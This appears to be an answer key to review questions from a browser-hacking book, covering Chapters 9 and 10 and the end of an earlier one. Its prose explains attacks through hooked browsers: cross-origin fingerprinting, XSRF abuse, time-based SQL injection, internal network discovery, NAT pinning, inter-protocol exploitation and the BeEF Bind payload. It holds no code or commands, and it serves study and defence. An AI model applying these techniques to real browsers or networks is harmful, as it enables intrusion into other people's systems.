
8. What are two ways to identify sites that have stored Flash data?

Flash data can be accessed within the browser via Shared Objects, and also within the local filesystem via referencing the folder appropriate to the host operating system: Library/Preferences/Macromedia/Flash Player/#SharedObjects/ on a Mac and C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player on Windows.

9. How can you detect if you have permission to access the webcam via Flash?

It is possible to check the webcam permission settings within a particular applet by right-clicking and selecting the Settings option.

10. Why are local file execution vulnerabilities impactful in corporate environments?

Local file execution vulnerabilities may be useful in corporate environments because it is common that files will be accessible on corporate file shares, which are automatically setup when the user logs onto the corporate domain. This gives the attacker potential access to a much larger range of files and programs than in a typical workstation alone.

Chapter 9

1. What are preflight requests?

Preflight requests are submitted before a Cross-Origin Resource Sharing (CORS) request to test preconditions in respect of the main request. If the request is cross-origin and the Content-Type is not one of application/x-www-form-urlencoded, multipart/form-data or text/plain, a preflight request is sent to the target. This is needed to verify if the requesting origin is allowed to communicate with the target.

2. How does cross-origin web application fingerprinting work? Is it respecting or violating the Same Origin Policy?

Cross-origin fingerprinting relies on the abilities to embed certain elements such as images, scripts or web pages from other origins, a feature which is intended and therefore respectful of the SOP. By using IFrames or requesting scripts or images from remote sites, elements can be loaded and specific properties tested for, in order to positively identify particular application variants that can be connected to.

3. How do you blindly hook a new domain? Describe an example.

As it is possible to submit requests to arbitrary destinations remaining respectful of the SOP, sometimes it is necessary to perform a blind hooking. This technique relies on the fact that oftentimes the result of a request may not be necessary in order for the request to be effective. By forging requests to vulnerable components, it may be possible to authenticate or exploit security vulnerabilities without being reliant on the response.

4. Is there a way to detect if the user is logged in to a web application, respecting the Same Origin Policy?

There are several possible techniques. One of the best is relying on the fact that many applications will respond with an error code if an authenticated resource is requested in a non-authenticated context. Although the responses cannot be read, the Same Origin Policy permits the request to another origin, and a JavaScript “onerror” or “onload” event will fire based upon the response code. Other techniques have been developed, for example by using a timing trick: if the user is authenticated, the response should in theory be bigger, thus it will take more time to load.

5. Why can combining an XSRF vulnerability with a Cross-Domain request potentially have devastating effects? How would a pseudo-random anti-XSRF token mitigate that?

XSRF vulnerabilities rely on the sameness of certain parameters with respect to static functions. If such vulnerabilities exists, most of the time it is possible for a script in another domain to make requests of such functions without violating the SOP. If the XSRF vulnerabily is post-auth for example, and the user is logged in, the browser will send necessary cookies to the target domain. An XSRF vulnerability ensures the attacker can have foreknowledge of all the parameters they need to pass to force the user into invoking a sensitive function. Obviously with certain functions, such as “Create User” or “Change Password”, the results could be devastating. The introduction of even a pseudo-random anti-XSRF token prevents such attacks, by requiring that the token’s previous value is submitted alongside the other parameters of the protected request. Without being able to read the response from the server, the token value cannot be retrieved. Even a basic random value may escalate the potential for brute-forcing the XSRF token’s value it into the realms of impracticality, given the latency associated with each request. However, there are cases where the XSRF token can be read cross-origin, for instance using some UI redressing attacks. The Fake CAPTCHA technique discussed in Chapter 4 is an example.

6. Which type of SQL injection is possible to detect cross-origin, respecting the Same Origin Policy? Is it blind or not?

Without violating the SOP you can still send cross-origin requests using XMLHttpRequest and monitor how long it takes for the response to come back. This means you can detect and exploit any type of SQL injection as far as you use time-delays. This normally involves triggering a time delay, either through a function to do just that such as waitfor (MSSQL), sleep (MySQL) or pg_sleep (Postgres) or through deliberate invocation of a CPU-intensive process such as benchmark (MySQL). If a SQL injection is error based, or boolean-based blind it can still be exploited through time-based blind SQL injection techniques.

7. How is it possible to proxy HTTP requests through the hooked browser?

The features of XMLHttpRequest objects allow full responses to be read, provided either a SOP bypass exists, the request is not violating the SOP or the cross-origin policy permits it. Due to this ability to parse raw HTTP, it is possible to establish the browser either as an open or restricted proxy given sufficient control over it. “Sufficient” is relatively easy to obtain since JavaScript provides full access to such features and only the SOP remains the impediment to a fully unrestricted proxy.

8. Describe how the GlassFish exploit (CVE-2012-0550) explained in the last section of the chapter works. Are there any caveats?

The GlassFish exploit relies upon the lack of XSRF tokens in the GlassFish administrator console. Other than the complexities associated with payload delivery in non-Gecko browsers (due to the absence of the sendAsBinary() method for the XMLHttpRequest object) the only caveat is that in order for the exploit to succeed, it must be launched from the (hooked) browser of an administrator of the GlassFish server who is presently logged into the administrator console.

9. How can you exploit a liberal cross-origin policy, which allows access from all domains? Describe a practical example.

A liberal cross-origin policy can be used to bypass the SOP. This allows an attacker in control of one particular origin to perform requests to an alternate origin that trusts all other origins through a relaxed policy, including access to the DOM. Another example would be using multiple browsers hooked on different origins to attack the same origin in a distributed fashion. For instance, you could start a dictionary attack on the login page of the site with such a liberal policy, distributing the dictionary data across browsers. Another example would be detecting and exploiting any type of injection flaw reliably (as you can read the response) from multiple browsers.

10. Provide an example of a web application pinch point.

There are too many potentially correct answers to list here. We have provided one example that may be overlooked. Any web application protecting its user’s passwords securely through the use of CPU-intensive hash function, such as bcrypt, may have a pinch point within the login mechanism. Repeated requests to the login mechanism may generate sufficient server CPU usage to slow down the server at very little cost to the attacking client. Therefore it is important to design login mechanisms with resilience in mind, for example by monitoring and throttling requests by IP address. Uncovering and exploiting these weaknesses may lead to Denial of Service conditions.

Chapter 10

1. Describe how to retrieve your target’s internal network IP address, and why this step is important.

The method necessary may depend upon the browser version the victim is using. Earlier versions of Firefox allowed the IP address to be queried directly from Java via JavaScript. Determining an internal IP in more modern browsers may involve quirks in other supported features or protocols, such as Web Real Time Communications (WebRTC). By setting up communication requests, data elements are populated with the IP address automatically, and the data extracted. This is important because knowledge of the IP address of the browser will expedite the ability to determine the existence of adjacent systems without relying on IP address brute-forcing (which may be very slow as there are millions of RFC 1918 private addresses).

2. If you’re unable to detect your target’s internal network IP address, what else can you do to identify its subnet?

You can use a simple subnet brute-forcing technique to submit XMLHttpRequests to a subset of IP addresses in a range of probable subnets. Although the RFC 1918 private address space is very large, most of it is within the subnet. It is common for organizations to use the 192.168 or 172.16-172.31 instead, and this provides a good starting point from which to iterate through the address space, looking for a gateway IP (which are normally given a final octet of .1 or .254).

3. Why is port banning an important security control?

Port-banning prevents the browser from interacting with commonly available services, because the port that is banned will not be accessible regardless of whether the SOP is bypassed or not. As many services typically use known ports, it can be very effective at preventing the browser being used to attack non-HTTP services encapsulating malicious data in HTTP requests. A famous example of an attack that happened in the wild some years ago is the spam sent to Freenode IRC channels. By default IRC daemons listen on port 6667/tcp and at the time of writing the port is banned only in Chrome and Safari. The IRC protocol is also tolerant to errors, and Inter-protocol Communication is possible. It turned out the attackers used multiple browsers to send spam to Freenode IRC channels, issuing HTTP requests that were encapsulating IRC commands. This is a simple example, however if a port is not banned and the listening daemon vulnerable to Inter-protocol Exploitation, things can get much worse as discussed at the end of Chapter 10.

4. How can you verify if TCP ports 22, 25, and 143, which are banned by every browser, are actually open?

You simply can’t, unless you have a Port Banning bypass.

5. Explain the NAT Pinning attack.

NAT Pinning attacks are a method to coerce a network edge device, such as a SOHO router or more generally a firewall, into inadvertently allowing access back towards a previously protected resource. Initially discovered by Sami Kamkar, the attacks relied on the ability for a browser on an internal network to send a request out to an attacker server, listening on an IRC port, while encapsulating IRC data within the HTTP request. By forging the request, the firewall sees the IRC Direct Client-to-Client (DCC) request, and then allows the return traffic back in.

6. When you achieve Inter-protocol Communication, is the SOP bypassed?

The SOP is not bypassed through IPC.

7. Describe what Inter-protocol Exploitation is, with an example.

Inter-protocol Exploitation (IPE) is leveraging Inter-protocol Communication (IPC) to send actual exploits to vulnerable services. This generally involves the encapsulation and submission of non-HTTP payloads to non-HTTP services, sometimes with binary contents.

8. What are the limitations of Inter-protocol Exploitation?

The limits of Inter-protocol Exploitation ultimately condense to the error tolerances; the limits to which a protocol will accept varying forms of input without generating an error message. What these are will vary extensively, depending on the nature and degree of dissimilarity between the two protocols. It could be a limitation in packet length or field length, or it could be a constraint imposed by the protocol which necessitating a certain form of input is received. Under certain conditions, meaningful communication may be impossible – if for example the protocol expects an explicit sequence of high-order bytes as the first element of any connection attempt, and you are only able to leverage the ASCII-based HTTP protocol. Another limitation, depending on the vulnerable target service and the type of exploit is the Shellcode space. For instance, you might target a tolerant protocol implementation that keeps the HTTP headers in the same buffer together with commands, and you might find out you don’t have enough space to add the Shellcode.

9. Why is the BeEF Bind split into two requests, and what are they?

BeEF Bind is split into two requests to facilitate a minimal length Shellcode used for the initial attack vector. By introducing a stager and a stage, the message length for the exploit can be truncated and the full-featured payload retrieved later in a separate communication once the execution path has been controlled. The stager is sent with the first request that exploits the bug, and is added to the memory of the target process. Later on, a second request to a new port binded by the stager is sent, which contains the stage. Now the full BeEF Bind payload is running in memory and you can start interacting with it.

10. Why is CORS important to BeEF Bind?

The BeEF Bind payload will relax the Cross-origin Resource Sharing policy, to allow access from any origin (so, any hooked browser). This is to ensure the SOP does not restrict receiving responses from the compromised server to the hooked browser.